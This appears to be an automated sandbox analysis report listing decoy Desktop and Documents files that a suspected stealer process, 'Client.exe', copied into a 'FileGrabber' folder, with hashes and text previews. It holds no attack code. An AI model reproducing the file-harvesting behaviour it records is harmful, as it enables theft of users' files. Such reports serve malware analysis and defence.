GEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\134349\FileGrabber\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\ProgramData\134349\FileGrabber\Documents\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Documents\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Documents\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\134349\FileGrabber\Documents\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\134349\FileGrabber\Documents\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZ